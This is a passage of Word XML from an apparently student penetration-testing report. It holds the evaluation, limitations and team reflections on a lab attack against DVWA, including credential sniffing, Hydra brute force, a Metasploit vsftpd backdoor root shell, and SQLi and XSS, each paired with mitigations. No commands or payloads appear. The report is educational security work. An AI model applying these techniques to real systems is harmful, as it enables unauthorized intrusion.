          <v:rect id="_x0000_i1036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3ED9A6" w14:textId="44CB9B56" w:rsidR="0037549E" w:rsidRDefault="00772F2C" w:rsidP="0037549E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc228099278"/>
      <w:bookmarkStart w:id="22" w:name="_Toc231851432"/>
      <w:r w:rsidRPr="00772F2C">
        <w:lastRenderedPageBreak/>
        <w:t>Evaluation, Limitations, and Reflection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="04FEC0C0" w14:textId="77777777" w:rsidR="007D4E67" w:rsidRPr="007D4E67" w:rsidRDefault="007D4E67" w:rsidP="007D4E67">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc231851433"/>
      <w:r w:rsidRPr="007D4E67">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>What Worked Well</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="37DB8EF6" w14:textId="21EB7F20" w:rsidR="005F795C" w:rsidRDefault="005F795C" w:rsidP="005F795C">
      <w:r w:rsidRPr="005F795C">
        <w:t>The project execution was very successful in all the structured phases of the penetration test</w:t>
      </w:r>
      <w:r w:rsidR="00F7582D">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AA6688" w14:textId="73004E21" w:rsidR="00717203" w:rsidRPr="00717203" w:rsidRDefault="005F795C" w:rsidP="00717203">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00717203">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab Connectivity &amp; Analysis:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F795C">
        <w:t xml:space="preserve"> The isolated NAT network enabled smooth communication between the Kali and Ubuntu VMs, enabling Wireshark to cleanly capture and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F795C">
        <w:t>analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F795C">
        <w:t xml:space="preserve"> clear text HTTP traffic and login credentials</w:t>
      </w:r>
      <w:r w:rsidR="00E816B7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E816B7" w:rsidRPr="00E816B7">
        <w:t>(Orebaugh et al., 2006)</w:t>
      </w:r>
      <w:r w:rsidRPr="005F795C">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD297CB" w14:textId="77777777" w:rsidR="00717203" w:rsidRPr="00717203" w:rsidRDefault="005F795C" w:rsidP="00717203">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00717203">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The results of the scanning &amp; enumeration</w:t>
      </w:r>
      <w:r w:rsidRPr="005F795C">
        <w:t xml:space="preserve"> were accurate and actionable and aligned with the OWASP Top 10 2021 categories, which clearly identified the attack surface. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D5AC41" w14:textId="766F13BD" w:rsidR="00717203" w:rsidRPr="00717203" w:rsidRDefault="005F795C" w:rsidP="00717203">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00717203">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploitation phase was 100% successful.</w:t>
      </w:r>
      <w:r w:rsidRPr="005F795C">
        <w:t xml:space="preserve"> All five attack vectors were flawlessly carried out and resulted in a Metasploit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F795C">
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F795C">
        <w:t xml:space="preserve"> backdoor exploit that successfully obtained a full root shell and complete system compromise</w:t>
      </w:r>
      <w:r w:rsidR="00C4374F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C4374F" w:rsidRPr="00C4374F">
        <w:t>(Rapid7, 2024; MITRE Corporation, 2011)</w:t>
      </w:r>
      <w:r w:rsidRPr="005F795C">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64351F90" w14:textId="0E46DEA6" w:rsidR="00CF1101" w:rsidRPr="00200CCF" w:rsidRDefault="005F795C" w:rsidP="00CF1101">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00717203">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The mitigation strategy</w:t>
      </w:r>
      <w:r w:rsidRPr="005F795C">
        <w:t xml:space="preserve"> was naturally aligned with the exploitation finding, which was an aspect of the Defensive Alignment. The team layered the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F795C">
        <w:t>defenses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F795C">
        <w:t xml:space="preserve"> on the LAMP stack layers (Apache, PHP, MariaDB) and easily aligned </w:t>
      </w:r>
      <w:r w:rsidR="00717203" w:rsidRPr="005F795C">
        <w:t>exploits</w:t>
      </w:r>
      <w:r w:rsidRPr="005F795C">
        <w:t xml:space="preserve"> (such as SQLi and XSS) to targeted and technical fixes</w:t>
      </w:r>
      <w:r w:rsidR="00C4374F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C4374F" w:rsidRPr="00C4374F">
        <w:t>(Scarfone et al., 2008)</w:t>
      </w:r>
      <w:r w:rsidRPr="005F795C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5586151B" w14:textId="1D933FED" w:rsidR="002470C7" w:rsidRPr="002470C7" w:rsidRDefault="002470C7" w:rsidP="002470C7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc231851434"/>
      <w:r w:rsidRPr="002470C7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>What Failed and Why</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="13E498DC" w14:textId="77777777" w:rsidR="002470C7" w:rsidRPr="002470C7" w:rsidRDefault="002470C7" w:rsidP="002470C7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002470C7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>While the project was successful, the team encountered and overcame several technical hurdles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CE59ED" w14:textId="77777777" w:rsidR="00CF1101" w:rsidRPr="00CF1101" w:rsidRDefault="00DD5615" w:rsidP="002470C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5615">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Network Connectivity: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5615">
        <w:t xml:space="preserve">Kali VM was unable to get a DHCP lease initially. The problem was solved by manually assigning an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD5615">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD5615">
        <w:t xml:space="preserve"> address and re-enabling </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD5615">
        <w:t>nat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD5615">
        <w:t xml:space="preserve"> for the service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD87E6D" w14:textId="7E89B513" w:rsidR="00CF1101" w:rsidRPr="00CF1101" w:rsidRDefault="00CF1101" w:rsidP="002470C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF1101">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Environment Compatibility: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF1101">
        <w:t xml:space="preserve">PHP 8.5 incompatibility with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF1101">
        <w:t>pdo_mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF1101">
        <w:t xml:space="preserve"> extension meant that the change was made from a native LAMP installation to a Docker-based DVWA deployment</w:t>
      </w:r>
      <w:r w:rsidR="0014045E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E5D680" w14:textId="2FEE4640" w:rsidR="00CF1101" w:rsidRPr="00CF1101" w:rsidRDefault="00CF1101" w:rsidP="002470C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF1101">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tool Limitations: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF1101">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF1101">
        <w:t>http_login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF1101">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF1101">
        <w:t>http_form</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF1101">
        <w:t xml:space="preserve"> modules in Metasploit did not support the authentication system used by DVWA, and so these had to be pivoted to Hydra for the credentials to be brute forced.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF1101">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6149A595" w14:textId="76D09A9F" w:rsidR="00CF1101" w:rsidRPr="00200CCF" w:rsidRDefault="00CF1101" w:rsidP="00CF1101">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF1101">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Improving Mitigations: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF1101">
        <w:t>Early drafts of mitigations were too vague. These were tuned by creating map recommendations directly to lab specific configurations like apache2.conf directives and tuned MariaDB privilege sets</w:t>
      </w:r>
      <w:r w:rsidR="0014045E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0014045E" w:rsidRPr="0014045E">
        <w:t>(Apache Software Foundation, 2024; MariaDB Foundation, 2024).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FC9BDE" w14:textId="16003A3C" w:rsidR="002470C7" w:rsidRPr="00CF1101" w:rsidRDefault="002470C7" w:rsidP="00CF1101">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc231851435"/>
      <w:r w:rsidRPr="00CF1101">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Limitations of the Lab Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="351C68EB" w14:textId="479FB6E7" w:rsidR="005B162C" w:rsidRDefault="007A6F42" w:rsidP="00CF1101">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A6F42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Isolation of NAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6F42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ab: </w:t>
      </w:r>
      <w:r w:rsidRPr="007A6F42">
        <w:t>The NAT lab is not as complex or as heavily trafficked as a production environment, nor is it as well-defended as a production environment with hardware WAFs, IDS/IPS, etc</w:t>
      </w:r>
      <w:r w:rsidR="00200CCF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00200CCF" w:rsidRPr="00200CCF">
        <w:t>(Scarfone et al., 2008)</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6F42">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F80FCC8" w14:textId="5495265F" w:rsidR="00CF1101" w:rsidRPr="005B162C" w:rsidRDefault="005B162C" w:rsidP="00CF1101">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B162C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Containerization Impact: </w:t>
      </w:r>
      <w:r w:rsidRPr="005B162C">
        <w:t>The deployment that was done with Docker, wrapped the web app, which changed some of the post-exploitation paths from native OS to a littl</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="005B162C">
        <w:t xml:space="preserve"> different pa</w:t>
      </w:r>
      <w:r>
        <w:t>th</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD37A89" w14:textId="361793FD" w:rsidR="005B162C" w:rsidRPr="005B162C" w:rsidRDefault="00000000" w:rsidP="005B162C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="0FBBE39C">
          <v:rect id="_x0000_i1037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C69E06" w14:textId="77777777" w:rsidR="002470C7" w:rsidRDefault="002470C7" w:rsidP="002470C7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="512FAE23" w14:textId="77777777" w:rsidR="003969CC" w:rsidRPr="003969CC" w:rsidRDefault="003969CC" w:rsidP="003969CC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc231851436"/>
      <w:r w:rsidRPr="003969CC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Individual Reflections</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="13DAAAD0" w14:textId="77777777" w:rsidR="005B162C" w:rsidRPr="005B162C" w:rsidRDefault="003969CC" w:rsidP="003969CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003969CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Raheel (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003969CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Footprinting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003969CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; Reconnaissance):</w:t>
      </w:r>
      <w:r w:rsidRPr="003969CC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F967FC" w:rsidRPr="00F967FC">
        <w:t xml:space="preserve">The first reconnaissance and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F967FC" w:rsidRPr="00F967FC">
        <w:t>footprinting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F967FC" w:rsidRPr="00F967FC">
        <w:t xml:space="preserve"> stages enabled me to systematically map the target attack surface, prior to any active exploitation. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D385440" w14:textId="15A5BE52" w:rsidR="003969CC" w:rsidRDefault="00F967FC" w:rsidP="005B162C">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00F967FC">
        <w:t>Knowing how important the information-gathering phase is</w:t>
      </w:r>
      <w:r w:rsidR="009A266F">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00EA3CE5">
        <w:t xml:space="preserve"> it</w:t>
      </w:r>
      <w:r w:rsidRPr="00F967FC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA3CE5">
        <w:t>had</w:t>
      </w:r>
      <w:r w:rsidRPr="00F967FC">
        <w:t xml:space="preserve"> given me a great appreciation of how much it determines the success and what my method would be after the information-gathering phase, as everything is driven by that. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AEB54B" w14:textId="77777777" w:rsidR="009608CD" w:rsidRDefault="009608CD" w:rsidP="005B162C">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F63E2CC" w14:textId="77777777" w:rsidR="009608CD" w:rsidRPr="005B162C" w:rsidRDefault="009608CD" w:rsidP="009608CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003969CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hriday (Packet Analysis &amp; Credential Capture):</w:t>
      </w:r>
      <w:r w:rsidRPr="003969CC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D63679">
        <w:t xml:space="preserve">By capturing the network traffic I got hands-on experience in how information can be extracted directly from the communications stream of a target system. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BD0489" w14:textId="7D91674F" w:rsidR="009608CD" w:rsidRPr="009608CD" w:rsidRDefault="009608CD" w:rsidP="009608CD">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63679">
        <w:t xml:space="preserve">By </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D63679">
        <w:t>analyzing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D63679">
        <w:t xml:space="preserve"> the communications in Wireshark, it was clear how much sensitive information can be obtained from an insecure login that takes place over HTTP, which is why encrypted communication protocols such as HTTPS are so important.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586C7843" w14:textId="77777777" w:rsidR="005B162C" w:rsidRPr="003969CC" w:rsidRDefault="005B162C" w:rsidP="005B162C">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49B3848C" w14:textId="77777777" w:rsidR="009A266F" w:rsidRPr="009A266F" w:rsidRDefault="003969CC" w:rsidP="005B162C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003969CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ahan (Scanning &amp; Enumeration):</w:t>
      </w:r>
      <w:r w:rsidRPr="003969CC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> I was </w:t>
      </w:r>
      <w:r w:rsidR="00E207D6">
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00E207D6" w:rsidRPr="00E207D6">
        <w:t xml:space="preserve">esponsible for executing Nmap, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E207D6" w:rsidRPr="00E207D6">
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E207D6" w:rsidRPr="00E207D6">
        <w:t xml:space="preserve"> and DIRB on the target. The configuration of the lab was a challenge because of PHP compatibility problems</w:t>
      </w:r>
      <w:r w:rsidR="009A266F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6504E56D" w14:textId="70BD1FA7" w:rsidR="003969CC" w:rsidRPr="005B162C" w:rsidRDefault="009A266F" w:rsidP="009A266F">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A266F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>But</w:t>
      </w:r>
      <w:r w:rsidR="00E207D6" w:rsidRPr="009A266F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E207D6" w:rsidRPr="00E207D6">
        <w:t>once these were addressed, the lab setup helped me better understand web server configuration, as well as the practical scanning activities. This helped me envision how such tools would be used within a real pen test, which was hugely beneficial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502F91AC" w14:textId="77777777" w:rsidR="005B162C" w:rsidRPr="005B162C" w:rsidRDefault="005B162C" w:rsidP="005B162C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68370944" w14:textId="6DFF539D" w:rsidR="005B162C" w:rsidRPr="005B162C" w:rsidRDefault="003969CC" w:rsidP="005B162C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003969CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kishan (Infrastructure Exploitation &amp; Brute-Force):</w:t>
      </w:r>
      <w:r w:rsidRPr="003969CC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E207D6" w:rsidRPr="00E207D6">
        <w:t>The implementation of the infrastructure exploitation and brute force attacks provided me with practical experience in the real world of attacking system access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E2800F" w14:textId="57D10F73" w:rsidR="003969CC" w:rsidRDefault="00E207D6" w:rsidP="005B162C">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E207D6">
        <w:t xml:space="preserve"> Operating Hydra on the login portal and then getting a complete root shell with just a single Metasploit module further underscored the importance of having good patch maintenance and rate limits in place in a production environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2927E554" w14:textId="77777777" w:rsidR="005B162C" w:rsidRPr="005B162C" w:rsidRDefault="005B162C" w:rsidP="005B162C">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58987A86" w14:textId="77777777" w:rsidR="005B162C" w:rsidRPr="005B162C" w:rsidRDefault="003969CC" w:rsidP="003969CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003969CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sibi (Web Exploitation &amp; Defenses):</w:t>
      </w:r>
      <w:r w:rsidRPr="003969CC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D63679" w:rsidRPr="00D63679">
        <w:t xml:space="preserve">Performing the web-based attacks (SQL Injection and XSS) and then writing the recommendations for the attacks was a fine example of converting the results of the penetration test into practical defensive measures. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175783C9" w14:textId="7A959C42" w:rsidR="003969CC" w:rsidRDefault="00D63679" w:rsidP="005B162C">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D63679">
        <w:t>The ability to follow my own SQLi and XSS attacks back to the specific remediation steps, such as using parameterized queries and output encoding, gave me a much better grasp of how the attack and the defence were connected as it pertains to the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E9EC56" w14:textId="77777777" w:rsidR="005B162C" w:rsidRPr="003969CC" w:rsidRDefault="005B162C" w:rsidP="005B162C">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F801BB7" w14:textId="69661108" w:rsidR="002470C7" w:rsidRPr="002470C7" w:rsidRDefault="00000000" w:rsidP="002470C7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="2C69942B">
          <v:rect id="_x0000_i1038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="603DF767" w14:textId="77777777" w:rsidR="00A91E1F" w:rsidRPr="00A91E1F" w:rsidRDefault="00A91E1F" w:rsidP="00A91E1F">
      <w:bookmarkStart w:id="27" w:name="_Toc228099279"/>
    </w:p>
    <w:p w14:paraId="3AAAFE3D" w14:textId="43416975" w:rsidR="00772F2C" w:rsidRDefault="00772F2C" w:rsidP="00772F2C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc231851437"/>
      <w:r w:rsidRPr="00772F2C">
        <w:lastRenderedPageBreak/>
        <w:t>References</w:t>
      </w:r>
